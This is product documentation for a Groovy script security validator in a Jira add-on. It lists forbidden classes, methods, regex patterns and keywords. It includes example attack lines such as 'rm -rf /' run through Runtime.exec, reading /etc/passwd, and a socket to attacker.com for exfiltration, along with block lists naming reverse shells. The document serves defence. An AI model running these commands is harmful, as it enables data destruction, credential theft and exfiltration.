/
Script Security Restrictions

Script Security Restrictions

Overview

For security reasons, we have implemented strict validation rules for Groovy script execution in script fields. Previously, customers could execute any code without restrictions, which posed significant security risks. This document outlines the new security measures and restrictions that have been put in place.

Security Implementation

The new security validator (GroovyScriptValidator) implements a comprehensive deny-list approach that prevents execution of potentially dangerous code patterns, classes, and methods.

Restricted Categories

1. Forbidden Classes

The following classes are completely prohibited from use in Groovy scripts:

Class

Reason for Restriction

Security Risk

Class

Reason for Restriction

Security Risk

Runtime

System command execution

Can execute arbitrary system commands

Process

Process manipulation

Can start external processes

ProcessBuilder

Process creation

Can build and execute system processes

ClassLoader

Dynamic class loading

Can load malicious classes

Method

Reflection access

Can invoke private/protected methods

Constructor

Reflection access

Can instantiate restricted objects

System

System-level access

Can manipulate system properties and exit JVM

File

File system access

Can read/write/delete files

FileInputStream/FileOutputStream

File I/O operations

Can access sensitive files

FileWriter/FileReader

File operations

Can modify system files

Files/Paths

NIO file operations

Can perform advanced file system operations

Socket/ServerSocket

Network access

Can establish network connections

DriverManager

Database connections

Can access databases directly

Connection

Database access

Can manipulate database connections

InitialContext

JNDI access

Can perform JNDI lookups

ScriptEngine/ScriptEngineManager

Script execution

Can execute nested scripts

GroovyShell

Groovy execution

Can execute dynamic Groovy code

GroovyClassLoader

Dynamic loading

Can load and execute arbitrary Groovy classes

Eval

Code evaluation

Can evaluate arbitrary expressions

2. Forbidden Methods

These methods are blocked regardless of the class they’re called on:

Method

Reason for Restriction

Example Use Case to Avoid

Method

Reason for Restriction

Example Use Case to Avoid

exec

Command execution

Runtime.getRuntime().exec("rm -rf /")

execute

Process execution

ProcessBuilder.execute()

start

Process starting

process.start()

getRuntime

System runtime access

Runtime.getRuntime()

load/loadClass

Dynamic class loading

ClassLoader.loadClass("malicious.Class")

forName

Class reflection

Class.forName("java.lang.Runtime")

newInstance

Object instantiation

Class.newInstance()

invoke

Method invocation

method.invoke(object, args)

getDeclaredMethod/Field

Reflection access

Accessing private members

setAccessible

Security bypass

Making private members accessible

exit/halt

JVM termination

System.exit(0)

gc/runFinalization

JVM control

Forcing garbage collection

addShutdownHook

JVM lifecycle

Adding shutdown hooks

getenv/getProperty

Environment access

Reading system properties

setProperty

System modification

Modifying system properties

3. Suspicious Patterns (Regex-based Detection)

The validator uses regular expressions to suspicious dangerous code patterns:

Pattern

Description

Example

Risk

Pattern

Description

Example

Risk

Command execution patterns

Detects command execution attempts

exec("malicious command")

System compromise

File system access

Detects file path manipulations

new File("/etc/passwd")

Data theft

Reflection patterns

Detects Class.forName usage

Class.forName("Runtime")

Security bypass

Method/Field access

Detects reflection-based access

.class.getMethod("exec")

Private member access

Nested script execution

Detects dynamic script creation

new GroovyShell().evaluate(code)

Code injection

System manipulation

Detects system-level operations

System.exit(1)

Service disruption

Dangerous imports

Detects risky import statements

import java.lang.Runtime

Access to restricted classes

JNDI operations

Detects naming context usage

context.lookup("malicious")

Remote code execution

Network operations

Detects socket/URL usage

new Socket("attacker.com", 1337)

Data exfiltration

Database access

Detects direct DB connections

DriverManager.getConnection()

Data breach

Serialization

Detects object streams

new ObjectInputStream()

Deserialization attacks

4. Suspicious Keywords

Scripts containing these keywords are flagged and rejected:

Keyword

Reason

Keyword

Reason

payload

Indicates potential exploit code

exploit

Suggests malicious intent

shell

Often associated with shell access

backdoor

Indicates unauthorized access attempts

virus/malware/trojan

Malicious software indicators

rootkit

System-level compromise tools

keylogger

Data theft tools

botnet

Distributed attack tools

reverse_shell/bind_shell

Remote access tools

Additional Security Measures

Script Size Limitation

  • Maximum script size: 10KB

  • Reason: Prevents resource exhaustion and limits the complexity of potential attacks

Normalization Process

Scripts undergo normalization before validation:

  • Whitespace normalization

  • Comment removal (both // and /* */)

  • Case conversion for pattern matching

Examples of Restricted Code

❌ Prohibited Examples

// System command executionRuntime.getRuntime().exec("rm -rf /")// File system accessnew File("/etc/passwd").delete()// Reflection-based security bypassClass.forName("java.lang.Runtime").getMethod("exec").invoke(null, "malicious_command")// Network accessnew Socket("attacker.com", 1337)// Database manipulationDriverManager.getConnection("jdbc:h2:mem:test")// Dynamic script executionnew GroovyShell().evaluate("malicious code here")// System property manipulationSystem.setProperty("java.security.manager", null)

✅ Allowed Examples

// String manipulationdef result = "Hello " + input.toUpperCase()// Date operationsimport java.time.LocalDateTime def now = LocalDateTime.now()// Math operationsdef calculation = Math.sqrt(input * 2)// Collection operationsdef list = [1, 2, 3, 4, 5]def filtered = list.findAll { it > 2 }// HTTP client operations (allowed)import java.net.http.HttpClient // Note: HTTP operations are permitted for legitimate API calls// Basic object creation and manipulationclass MyClass { String property }def obj = new MyClass(property: "value")

Migration Guide

For Existing Scripts

If your existing scripts are now failing validation, consider these alternatives:

  1. File Operations: Instead of direct file access, use approved APIs or request specific functionality from administrators

  2. System Commands: Replace with Java/Groovy native operations or approved utility methods

  3. Database Access: Use provided database connection objects instead of creating direct connections

  4. Network Operations: Use approved HTTP client libraries where available

Best Practices

  1. Keep scripts simple: Focus on data transformation and business logic

  2. Use approved libraries: Stick to standard Java/Groovy libraries for common operations

  3. Avoid reflection: Use direct method calls instead of reflection-based approaches

  4. Test early: Validate your scripts in development environments before deployment

Technical Implementation Details

  • Validator Class: com.deiser.jira.profields.groovy.security.GroovyScriptValidator

  • Validation Method: validateScript(String script)

  • Return Type: ValidationResult with validation status and error messages

  • Performance: Validation is performed before script execution to prevent security risks

Error Messages

When a script violates security rules, you’ll receive specific error messages:

  • "Use of forbidden class: [ClassName]"

  • "Use of forbidden method: [methodName]"

  • "Dangerous pattern detected: [pattern]"

  • "Suspicious keyword detected: [keyword]"

  • "Script too long (>10KB)"

Note: These security measures are non-negotiable and cannot be disabled. They are essential for maintaining system security and protecting against malicious code execution.